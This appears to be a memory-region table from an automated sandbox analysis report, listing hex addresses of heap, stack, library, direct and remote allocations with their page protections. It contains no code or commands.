6A8A000
stack
page read and write
3FD8000
heap
page read and write
3FD0000
heap
page read and write
7FFD34312000
trusted library allocation
page read and write
17F153E000
stack
page read and write
7A80000
heap
page read and write
6B3E000
stack
page read and write
47B0000
heap
page read and write
47D1000
heap
page read and write
204101B8000
heap
page read and write
307A000
heap
page read and write
2A76000
heap
page read and write
227D3000
unclassified section
page execute and read and write
4F30000
heap
page read and write
7FFD34500000
trusted library allocation
page execute and read and write
3F6E000
stack
page read and write
436F000
stack
page read and write
67B0000
direct allocation
page read and write
4CA3000
heap
page read and write
4889000
heap
page read and write
6C30000
heap
page execute and read and write
4F2F000
heap
page read and write
1ACFDA20000
heap
page read and write
5110000
trusted library allocation
page read and write
30DA000
heap
page read and write
1ACE55B1000
trusted library allocation
page read and write
7B6B000
trusted library allocation
page read and write
278E000
unkown
page read and write
47D0000
heap
page read and write
30C0000
heap
page read and write
80F0000
direct allocation
page read and write
4370000
heap
page execute and read and write
226CB000
heap
page read and write
204101A3000
heap
page read and write
1ACE5500000
heap
page execute and read and write
7A30000
trusted library allocation
page read and write
7D0C000
stack
page read and write
4F47000
heap
page read and write
1ACFDC80000
heap
page read and write
47C0000
heap
page read and write
22320000
direct allocation
page read and write
1ACF55C0000
trusted library allocation
page read and write
1ACFDA00000
heap
page read and write
4F1D000
heap
page read and write
1ACE6115000
trusted library allocation
page read and write
221FC000
stack
page read and write
53A9000
trusted library allocation
page read and write
6D07000
heap
page read and write
69D0000
heap
page read and write
34E0000
heap
page read and write
4F2B000
heap
page read and write
2040E43C000
heap
page read and write
306E000
unkown
page read and write
4012000
trusted library allocation
page read and write
69B0000
direct allocation
page read and write
1ACFDC88000
heap
page read and write
4B78000
trusted library allocation
page read and write
4F1E000
heap
page read and write
80D0000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
1ACE54D7000
heap
page execute and read and write
6A7A000
heap
page read and write
2040E473000
heap
page read and write
67F0000
direct allocation
page read and write
4F48000
heap
page read and write
1ACE3BB0000
trusted library allocation
page read and write
2040E52B000
heap
page read and write
7B50000
trusted library allocation
page read and write
1ACE5B5A000
trusted library allocation
page read and write
4F3A000
heap
page read and write
6949DFE000
stack
page read and write
6A5A000
heap
page read and write
3FE3000
trusted library allocation
page execute and read and write
3214000
heap
page read and write
42AE000
stack
page read and write
7FFD344F5000
trusted library allocation
page read and write
6AA6000
heap
page read and write
2272C000
heap
page read and write
4F42000
heap
page read and write
2A4A000
heap
page read and write
80B0000
trusted library allocation
page read and write
3214000
heap
page read and write
2A6F000
heap
page read and write
6AA6000
heap
page read and write
6A61000
heap
page read and write
400A000
trusted library allocation
page execute and read and write
7A70000
trusted library allocation
page execute and read and write
6920000
heap
page read and write
3FB0000
trusted library section
page read and write
4F37000
heap
page read and write
6A56000
heap
page read and write
2D0F000
unkown
page read and write
6FA0000
trusted library allocation
page read and write
226B7000
heap
page read and write
1ACFDCDF000
heap
page read and write
4F19000
heap
page read and write
1ACE71F2000
trusted library allocation
page read and write
8010000
trusted library allocation
page read and write
3214000
heap
page read and write
3214000
heap
page read and write
69C0000
direct allocation
page read and write
400000
system
page execute and read and write
307A000
heap
page read and write
6A7A000
heap
page read and write
6A58000
heap
page read and write
22836000
unclassified section
page execute and read and write
6BE0000
direct allocation
page read and write
2CA5000
heap
page read and write
7010000
trusted library allocation
page read and write
17F163C000
stack
page read and write
1ACE3AB1000
heap
page read and write
204101C4000
heap
page read and write
3214000
heap
page read and write
4F37000
heap
page read and write
3FF9000
trusted library allocation
page read and write
2272F000
heap
page read and write
1ACF58A8000
trusted library allocation
page read and write
4F48000
heap
page read and write
7FFD34590000
trusted library allocation
page read and write
1ACE5BF4000
trusted library allocation
page read and write
303A000
stack
page read and write
21AE0000
direct allocation
page read and write
4B9B000
trusted library allocation
page read and write
7FFD346A0000
trusted library allocation
page read and write
4BD0000
trusted library allocation
page read and write
2040E3D7000
heap
page read and write
1ACE73C8000
trusted library allocation
page read and write
2C30000
heap
page read and write
7000000
trusted library allocation
page read and write
7FFD34610000
trusted library allocation
page read and write
67E0000
direct allocation
page read and write
4E0E000
stack
page read and write
2040E528000
heap
page read and write
17F15B6000
stack
page read and write
227B9000
unclassified section
page execute and read and write
473000
system
page execute and read and write
34E3000
heap
page read and write
1ACE3AD1000
heap
page read and write
204101C4000
heap
page read and write
3070000
heap
page read and write
7B0F000
stack
page read and write
3076000
heap
page read and write
4F25000
heap
page read and write
8100000
direct allocation
page read and write
307A000
heap
page read and write
6A4A000
heap
page read and write
3FE0000
trusted library allocation
page read and write
1ACE3A30000
heap
page read and write
7D50000
heap
page read and write
8945000
direct allocation
page execute and read and write
2040E41F000
heap
page read and write
5110000
trusted library allocation
page read and write
2040E463000
heap
page read and write
4381000
trusted library allocation
page read and write
6A70000
heap
page read and write
1ACE3A91000
heap
page read and write
47B1000
heap
page read and write
21B20000
direct allocation
page read and write
4CA0000
heap
page read and write
7FFD34680000
trusted library allocation
page read and write
7FFD345F0000
trusted library allocation
page read and write
6BFE000
stack
page read and write
7FFD34630000
trusted library allocation
page read and write
1ACE54D0000
heap
page execute and read and write
4F19000
heap
page read and write
2040E48E000
heap
page read and write
4F42000
heap
page read and write
7FFD34313000
trusted library allocation
page execute and read and write
20410323000
heap
page read and write
34EE000
heap
page read and write
307A000
heap
page read and write
7B70000
trusted library allocation
page read and write
6F5D000
stack
page read and write
47C1000
heap
page read and write
7E3C000
heap
page read and write
6F80000
trusted library allocation
page read and write
7FFD34670000
trusted library allocation
page read and write
2CA4000
heap
page read and write
4F30000
heap
page read and write
2DFC000
stack
page read and write
47B1000
heap
page read and write
4030000
trusted library allocation
page read and write
21EA0000
heap
page read and write
2040E3B6000
heap
page read and write
4F19000
heap
page read and write
204101AB000
heap
page read and write
4F46000
heap
page read and write
24C0000
heap
page read and write
21AD0000
direct allocation
page read and write
7FFD344B0000
trusted library allocation
page read and write
2CA4000
heap
page read and write
222F0000
unclassified section
page execute and read and write
6F90000
trusted library allocation
page read and write
2040E434000
heap
page read and write
2A78000
heap
page read and write
6A57000
heap
page read and write
7FFD34310000
trusted library allocation
page read and write
7FFD343C0000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
4D3F000
stack
page read and write
4F10000
trusted library allocation
page read and write
6B7E000
stack
page read and write
6C40000
trusted library allocation
page read and write
459000
system
page execute and read and write
7F3E0000
trusted library allocation
page execute and read and write
4F2F000
heap
page read and write
29C2000
stack
page read and write
6FF0000
trusted library allocation
page read and write
4F2F000
heap
page read and write
2CA4000
heap
page read and write
7D4C000
stack
page read and write
4F58000
heap
page read and write
2040E448000
heap
page read and write
6FE0000
trusted library allocation
page read and write
4F1D000
heap
page read and write
2CA4000
heap
page read and write
47DE000
heap
page read and write
7FFD345E0000
trusted library allocation
page read and write
2040FE50000
heap
page read and write
7FFD3431D000
trusted library allocation
page execute and read and write
47C1000
heap
page read and write
7E00000
heap
page read and write
6A58000
heap
page read and write
17F193C000
stack
page read and write
47B1000
heap
page read and write
2040E439000
heap
page read and write
2D9C000
heap
page read and write
4F2F000
heap
page read and write
204101C0000
heap
page read and write
4F10000
heap
page read and write
2040E52D000
heap
page read and write
68B0000
direct allocation
page read and write
4F20000
heap
page read and write
2040E48E000
heap
page read and write
690000
heap
page read and write
7FFD343C6000
trusted library allocation
page read and write
7E20000
heap
page read and write
4BD0000
heap
page read and write
8140000
trusted library allocation
page execute and read and write
4F2C000
heap
page read and write
2040E41F000
heap
page read and write
4CA1000
heap
page read and write
47B0000
heap
page read and write
456000
system
page execute and read and write
3214000
heap
page read and write
4F21000
heap
page read and write
4F37000
heap
page read and write
6CE2000
heap
page read and write
2040E520000
heap
page read and write
1ACE610B000
trusted library allocation
page read and write
1ACFDABC000
heap
page read and write
220AE000
stack
page read and write
2040E3CE000
heap
page read and write
3079000
heap
page read and write
6AA6000
heap
page read and write
204101C4000
heap
page read and write
4F18000
heap
page read and write
2040E479000
heap
page read and write
1ACE5430000
trusted library allocation
page read and write
6C73000
heap
page read and write
2040E2A0000
heap
page read and write
7FFD343D0000
trusted library allocation
page execute and read and write
4265000
heap
page execute and read and write
1ACE3930000
heap
page read and write
463F000
stack
page read and write
4F2F000
heap
page read and write
7FFD3432B000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
204101A0000
heap
page read and write
1ACFDC70000
heap
page read and write
7DF442F70000
trusted library allocation
page execute and read and write
1ACFDC78000
heap
page read and write
6FC0000
trusted library allocation
page read and write
4F18000
heap
page read and write
7FFD34314000
trusted library allocation
page read and write
6CEB000
heap
page read and write
4822000
heap
page read and write
4260000
remote allocation
page execute and read and write
2910000
heap
page read and write
223D1000
heap
page read and write
27CE000
stack
page read and write
1ACE3A10000
heap
page read and write
1ACE3ABF000
heap
page read and write
2040E432000
heap
page read and write
7FFD34540000
trusted library allocation
page read and write
1ACE3BE0000
heap
page readonly
2D5D000
stack
page read and write
1ACE57D5000
trusted library allocation
page read and write
223D1000
heap
page read and write
204101A4000
heap
page read and write
22561000
heap
page read and write
5EC000
stack
page read and write
4260000
heap
page execute and read and write
2040E390000
heap
page read and write
2D90000
heap
page read and write
1ACE55A7000
heap
page read and write
7B60000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
2CA5000
heap
page read and write
7FFD34430000
trusted library allocation
page execute and read and write
7FFD344F7000
trusted library allocation
page read and write
4CA1000
heap
page read and write
6A55000
heap
page read and write
2DAA000
heap
page read and write
24A0000
heap
page read and write
4D48000
heap
page read and write
4C3E000
stack
page read and write
694A0FE000
stack
page read and write
7E2C000
heap
page read and write
6FD0000
trusted library allocation
page read and write
204101DB000
heap
page read and write
1ACFDC8C000
heap
page read and write
4F1F000
heap
page read and write
4F18000
heap
page read and write
4F11000
heap
page read and write
4F19000
heap
page read and write
2040E46E000
heap
page read and write
3FED000
trusted library allocation
page execute and read and write
400000
system
page execute and read and write
307A000
heap
page read and write
6A5A000
heap
page read and write
2040E407000
heap
page read and write
41EE000
stack
page read and write
2272F000
heap
page read and write
4F4D000
heap
page read and write
688A000
stack
page read and write
21B10000
direct allocation
page read and write
7B30000
trusted library allocation
page read and write
21EFE000
stack
page read and write
47C6000
heap
page read and write
4F1F000
heap
page read and write
17F18BE000
stack
page read and write
204101C4000
heap
page read and write
21FBB000
stack
page read and write
4F34000
heap
page read and write
6D26000
heap
page read and write
4F1F000
heap
page read and write
47C1000
heap
page read and write
3214000
heap
page read and write
222BF000
stack
page read and write
7E02000
heap
page read and write
17F11FE000
stack
page read and write
42EF000
stack
page read and write
1ACE71EE000
trusted library allocation
page read and write
224D5000
heap
page read and write
4F37000
heap
page read and write
4F2C000
heap
page read and write
5181000
heap
page read and write
2CA4000
heap
page read and write
7FFD344F2000
trusted library allocation
page read and write
1ACE55A0000
heap
page read and write
17F117E000
stack
page read and write
4F24000
heap
page read and write
29C4000
stack
page read and write
7FFD34690000
trusted library allocation
page read and write
8000000
trusted library allocation
page read and write
1ACE6B15000
trusted library allocation
page read and write
24A4000
heap
page read and write
47F3000
heap
page read and write
2040E3A1000
heap
page read and write
7E54000
heap
page read and write
22653000
heap
page read and write
7FFD34530000
trusted library allocation
page read and write
1ACE5A2A000
trusted library allocation
page read and write
47CF000
heap
page read and write
17F230E000
stack
page read and write
53E7000
trusted library allocation
page read and write
298C000
stack
page read and write
3210000
heap
page read and write
2640000
heap
page read and write
204101C4000
heap
page read and write
7FFD345A0000
trusted library allocation
page read and write
6F60000
trusted library allocation
page read and write
291C000
heap
page read and write
67C0000
direct allocation
page read and write
4F1B000
heap
page read and write
2223D000
stack
page read and write
2040E43C000
heap
page read and write
1ACFDA7A000
heap
page read and write
6AA6000
heap
page read and write
4F2F000
heap
page read and write
1ACFDA26000
heap
page read and write
21F7D000
stack
page read and write
2CA4000
heap
page read and write
7E44000
heap
page read and write
1ACE3C55000
heap
page read and write
2040E46B000
heap
page read and write
17F12FC000
stack
page read and write
47C6000
heap
page read and write
6A0000
heap
page readonly
2673000
heap
page read and write
2040E48E000
heap
page read and write
17F17BE000
stack
page read and write
47EE000
heap
page read and write
6910000
heap
page read and write
2040E4B0000
heap
page read and write
43DA000
trusted library allocation
page read and write
6F70000
trusted library allocation
page execute and read and write
2C40000
heap
page readonly
8110000
direct allocation
page read and write
26C4000
heap
page read and write
204101A7000
heap
page read and write
204101C4000
heap
page read and write
1ACFDB90000
heap
page read and write
34ED000
heap
page read and write
2040E407000
heap
page read and write
7FFD34560000
trusted library allocation
page read and write
20410320000
heap
page read and write
5181000
heap
page read and write
4F19000
heap
page read and write
6C00000
direct allocation
page read and write
4F1C000
heap
page read and write
4170000
trusted library allocation
page execute and read and write
1ACFDD51000
heap
page read and write
220EF000
stack
page read and write
264B000
heap
page read and write
204101AE000
heap
page read and write
7FFD34570000
trusted library allocation
page read and write
3214000
heap
page read and write
47C6000
heap
page read and write
2DA0000
heap
page read and write
4F2F000
heap
page read and write
7FFD344C1000
trusted library allocation
page read and write
2041034A000
heap
page read and write
6A54000
heap
page read and write
6AD0000
heap
page read and write
412C000
stack
page read and write
61C5000
remote allocation
page execute and read and write
4CA1000
heap
page read and write
2C50000
heap
page read and write
7DAE000
stack
page read and write
2040E3FD000
heap
page read and write
2040E437000
heap
page read and write
694978A000
stack
page read and write
9D45000
direct allocation
page execute and read and write
226FC000
heap
page read and write
8020000
trusted library allocation
page read and write
24A8000
heap
page read and write
2CA4000
heap
page read and write
227BD000
unclassified section
page execute and read and write
2040E481000
heap
page read and write
41B000
system
page execute and read and write
684E000
stack
page read and write
6A5A000
heap
page read and write
4F0E000
stack
page read and write
2D9C000
heap
page read and write
7B20000
trusted library allocation
page read and write
4F11000
heap
page read and write
22321000
direct allocation
page execute and read and write
4F1F000
heap
page read and write
47B1000
heap
page read and write
4F1B000
heap
page read and write
6FB0000
trusted library allocation
page read and write
1ACE55A5000
heap
page read and write
4015000
trusted library allocation
page execute and read and write
20410351000
heap
page read and write
3214000
heap
page read and write
47B0000
heap
page read and write
6A46000
heap
page read and write
3214000
heap
page read and write
3FAE000
stack
page read and write
21B00000
direct allocation
page read and write
2D9F000
stack
page read and write
47EF000
heap
page read and write
2CA4000
heap
page read and write
6F0000
heap
page read and write
7FFD343F6000
trusted library allocation
page execute and read and write
3214000
heap
page read and write
416E000
stack
page read and write
21AF0000
direct allocation
page read and write
1ACFDA57000
heap
page read and write
2040E42B000
heap
page read and write
2040E437000
heap
page read and write
A745000
direct allocation
page execute and read and write
2A79000
heap
page read and write
2CA5000
heap
page read and write
34BE000
unkown
page read and write
7030000
trusted library allocation
page read and write
2919000
heap
page read and write
29BF000
stack
page read and write
4F1F000
heap
page read and write
26E4000
heap
page read and write
22652000
heap
page read and write
204101DC000
heap
page read and write
6F1E000
stack
page read and write
7FFD345D0000
trusted library allocation
page read and write
67D0000
direct allocation
page read and write
4F2F000
heap
page read and write
4F5E000
heap
page read and write
307B000
heap
page read and write
1ACE5540000
heap
page read and write
407E000
stack
page read and write
20410351000
heap
page read and write
1ACE3AB7000
heap
page read and write
47B0000
heap
page read and write
45D000
system
page execute and read and write
1ACE5EF7000
trusted library allocation
page read and write
204101A1000
heap
page read and write
47C6000
heap
page read and write
6870000
heap
page read and write
307A000
heap
page read and write
2CA5000
heap
page read and write
2040E52C000
heap
page read and write
7FFD345B0000
trusted library allocation
page read and write
30A0000
heap
page read and write
17F14F9000
stack
page read and write
6BBE000
stack
page read and write
4F4D000
heap
page read and write
4F1F000
heap
page read and write
204101C4000
heap
page read and write
4F19000
heap
page read and write
3214000
heap
page read and write
30D0000
heap
page read and write
2478000
stack
page read and write
6790000
direct allocation
page read and write
6EDF000
stack
page read and write
6A46000
heap
page read and write
3214000
heap
page read and write
6D71000
heap
page read and write
1ACFD5BB000
heap
page read and write
2040E525000
heap
page read and write
4F1C000
heap
page read and write
7FFD34640000
trusted library allocation
page read and write
17F127E000
stack
page read and write
7FFD34320000
trusted library allocation
page read and write
227E0000
unclassified section
page execute and read and write
1ACFDD12000
heap
page read and write
5180000
heap
page read and write
1ACFDCB2000
heap
page read and write
17F137F000
stack
page read and write
2040E490000
heap
page read and write
2040E3E3000
heap
page read and write
307A000
heap
page read and write
2216F000
stack
page read and write
1ACE7209000
trusted library allocation
page read and write
22653000
heap
page read and write
57C5000
remote allocation
page execute and read and write
There are 812 hidden memdumps, click here to show them.